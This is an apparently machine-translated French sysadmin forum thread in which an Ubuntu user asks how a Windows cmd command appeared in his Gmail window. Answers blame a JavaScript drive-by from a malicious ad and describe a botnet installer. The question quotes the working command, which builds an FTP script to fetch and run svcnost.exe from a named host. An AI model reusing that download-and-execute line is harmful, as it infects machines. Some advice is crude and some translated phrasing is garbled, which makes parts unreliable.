129 votes

lluismontero avatar

Comment identifier si mon ordinateur Linux a été piraté ?

Demandé el 20 de Avril, 2011
Quand la question a-t-elle été
18972 affichage
Nombre de visites la question a
5 Réponses
Nombre de réponses aux questions
Résolu
Situation réelle de la question

Mon PC domestique est généralement allumé, mais l'écran est éteint. Ce soir, en rentrant du travail, j'ai découvert ce qui ressemble à une tentative de piratage : dans mon navigateur, mon Gmail était ouvert (c'était moi), mais il était en mode composition avec ce qui suit dans le champ TO champ :

md /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit echo Vous vous êtes fait avoir

Cela ressemble à un code de ligne de commande Windows pour moi, et le md Le début du code combiné au fait que Gmail était en mode composition, montre clairement que quelqu'un a essayé d'exécuter un cmd commande. Je suppose que j'ai eu de la chance car je n'utilise pas Windows sur ce PC, mais j'en ai d'autres qui le font. C'est la première fois qu'une telle chose m'arrive. Je ne suis pas un gourou de Linux et je n'exécutais pas d'autres programmes que Firefox à ce moment-là.

Je suis absolument sûr que ce n'est pas moi qui l'ai écrit, et que personne d'autre n'était physiquement devant mon ordinateur. De plus, j'ai récemment changé mon mot de passe Google (et tous mes autres mots de passe) pour quelque chose comme vMA8ogd7bv donc je ne pense pas que quelqu'un ait piraté mon compte Google.

Qu'est-ce qui vient de se passer ? Comment quelqu'un peut-il effectuer des frappes sur mon ordinateur alors qu'il ne s'agit pas de la vieille machine Windows de grand-mère qui exécute des logiciels malveillants depuis des années, mais d'une nouvelle installation Ubuntu récente ?

Mise à jour :
Permettez-moi d'aborder certains des points et des questions :

  • Je suis en Autriche, à la campagne. Mon routeur WLAN fonctionne WPA2 / PSK et un mot de passe de force moyenne qui n'est pas dans le dictionnaire ; il faudrait le forcer par brute et à moins de 50 mètres d'ici ; il est peu probable qu'il ait été piraté.
  • J'utilise un clavier filaire USB, il est donc très peu probable que quelqu'un se trouve à portée pour le pirater.
  • Je n'utilisais pas mon ordinateur à ce moment-là ; il tournait au ralenti à la maison pendant que j'étais au travail. Il s'agit d'un ordinateur portable monté sur moniteur, que j'éteins rarement.
  • La machine n'a que deux mois, ne fonctionne qu'avec Ubuntu, et je n'utilise pas de logiciels ou de sites bizarres. Il s'agit principalement de Stack Exchange, de Gmail et de journaux. Pas de jeux. Ubuntu est configuré pour se maintenir à jour.
  • Je n'ai pas connaissance d'un service VNC en cours d'exécution ; je n'en ai certainement pas installé ou activé un. Je n'ai pas non plus démarré d'autres serveurs. Je ne suis pas sûr qu'il y en ait un qui fonctionne par défaut dans Ubuntu ?
  • Je connais toutes les adresses IP dans l'activité du compte Gmail. Je suis presque sûr que Google n'était pas une porte d'entrée.
  • J'ai trouvé un Visionneuse de fichiers journaux mais je ne sais pas ce qu'il faut chercher. Vous pouvez m'aider ?

Ce que je veux vraiment savoir, et ce qui me fait me sentir en danger, c'est : Comment un internaute peut-il générer des frappes sur mon ordinateur ? Comment puis-je l'empêcher sans avoir l'air de tout vouloir dire ? Je ne suis pas un geek de Linux, je suis un père de famille qui s'est frotté à Windows pendant plus de 20 ans et qui en est fatigué. Et depuis plus de 18 ans que je suis en ligne, je n'ai jamais vu personnellement de tentative de piratage, donc c'est nouveau pour moi.

Demandé el 20 de Avril, 2011 par lluismontero

Réponses

Trop de publicités?

66voto

Riguez avatar
Riguez Points 3734

Je doute que vous ayez à vous inquiéter. C'était plus que probablement une attaque JavaScript qui a essayé de faire un téléchargement en mode drive by . Si vous craignez que cela se produise, commencez à utiliser NoScript y AdBlock Plus Compléments de Firefox.

Même en visitant des sites dignes de confiance, vous n'êtes pas en sécurité car ils exécutent du code JavaScript provenant d'annonceurs tiers qui peut être malveillant.

Je l'ai pris et l'ai exécuté dans une VM. Il a installé mirc et voici le journal d'état... http://pastebin.com/Mn85akMk

Il s'agit d'une attaque automatisée qui essaie de vous faire télécharger mIRC et de vous faire rejoindre un botnet qui vous transformera en spambot... Ma machine virtuelle s'est connectée et a établi une connexion avec un certain nombre d'adresses distantes différentes, dont l'une est la suivante autoemail-119.west320.com .

En l'exécutant sous Windows 7, j'ai dû accepter l'invite UAC et lui permettre d'accéder à travers le pare-feu.

Il semble qu'il y ait des tonnes de rapports de cette commande exacte sur d'autres forums, et quelqu'un dit même qu'un fichier torrent a essayé de l'exécuter lorsqu'il a fini de télécharger.... Je ne suis pas sûr comment cela serait possible cependant.

Je ne l'ai pas utilisé moi-même, mais il devrait être en mesure de vous montrer les connexions réseau actuelles afin que vous puissiez voir si vous êtes connecté à quelque chose qui sort de la norme : http://netactview.sourceforge.net/download.html

Répondu el 20 de Avril, 2011 par Riguez (3734 Points )

42voto

BlueRaja - Danny Pflughoeft avatar
BlueRaja - Danny Pflughoeft Points 7488

Je suis d'accord avec @jb48394 que c'est probablement un exploit JavaScript, comme tout le reste ces jours-ci.

Le fait qu'il ait essayé d'ouvrir un cmd fenêtre (voir Commentaire de @torbengb ) et exécuter une commande malveillante, plutôt que de simplement télécharger le cheval de Troie discrètement en arrière-plan, suggère qu'elle exploite une vulnérabilité dans Firefox qui lui permet de saisir des touches, mais pas d'exécuter du code.

Cela explique aussi pourquoi cet exploit, qui était clairement écrit exclusivement pour Windows, fonctionnerait également sous Linux : Firefox exécute JavaScript de la même manière dans tous les systèmes d'exploitation. (du moins, il essaie de le faire :) ) . S'il s'agissait d'un dépassement de tampon ou d'un exploit similaire destiné à Windows, le programme se serait simplement arrêté.

Quant à l'origine du code JavaScript, il s'agit probablement d'une publicité Google malveillante. (les publicités défilent dans Gmail tout au long de la journée) . Il s'agit de ne serait pas être le site premièrement temps .

Répondu el 20 de Avril, 2011 par BlueRaja - Danny Pflughoeft (7488 Points )

12voto

Shekhar avatar
Shekhar Points 4915

J'ai trouvé une attaque similaire sur une autre machine Linux. Il semble que ce soit une sorte de commande FTP pour Windows.

Répondu el 20 de Avril, 2011 par Shekhar (4915 Points )

5voto

Nate Koppenhaver avatar
Nate Koppenhaver Points 3621

Cela ne répond pas à toute votre question, mais dans le fichier journal, recherchez les tentatives de connexion qui ont échoué.

S'il y a plus de cinq tentatives ratées dans votre journal, c'est que quelqu'un a essayé de pirater le système. root . Si la tentative de connexion à l'ordinateur de l'entreprise est couronnée de succès, il est possible de se connecter à l'ordinateur. root pendant que vous étiez loin de votre ordinateur, CHANGEZ VOTRE MOT DE PASSE IMMÉDIATEMENT ! !! Je veux dire MAINTENANT ! De préférence quelque chose d'alphanumérique, et d'environ 10 caractères.

Avec les messages que vous avez reçus (les echo commandes) cela ressemble vraiment à un immature scriptmôme . Si c'était un vrai pirate qui savait ce qu'il faisait, vous ne le sauriez probablement toujours pas.

Répondu el 21 de Avril, 2011 par Nate Koppenhaver (3621 Points )

-1voto

rjt avatar
rjt Points 938

whois rapporte que west320.com est la propriété de Microsoft.

UPnP y Vino (Système -> Préférences -> Bureau à distance) combiné à un mot de passe Ubuntu faible ?

Avez-vous utilisé des référentiels non standard ?

DEF CON organise chaque année un concours de Wi-Fi pour déterminer à quelle distance un point d'accès Wi-Fi peut être atteint - aux dernières nouvelles, la distance était de 250 miles.

Si vous voulez vraiment être effrayé, regardez les captures d'écran d'un centre de commandement d'un Botnet Zeus . Aucune machine n'est sûre, mais Firefox sous Linux est plus sûr que les autres. Encore mieux, si vous exécutez SELinux .

Répondu el 20 de Avril, 2011 par rjt (938 Points )

Questions en vedette

Top Tags

Dans notre réseau

SistemesEz.com

SystemesEZ est une communauté de sysadmins où vous pouvez résoudre vos problèmes et vos doutes. Vous pouvez consulter les questions des autres sysadmins, poser vos propres questions ou résoudre celles des autres.

Powered by:

Yandex
X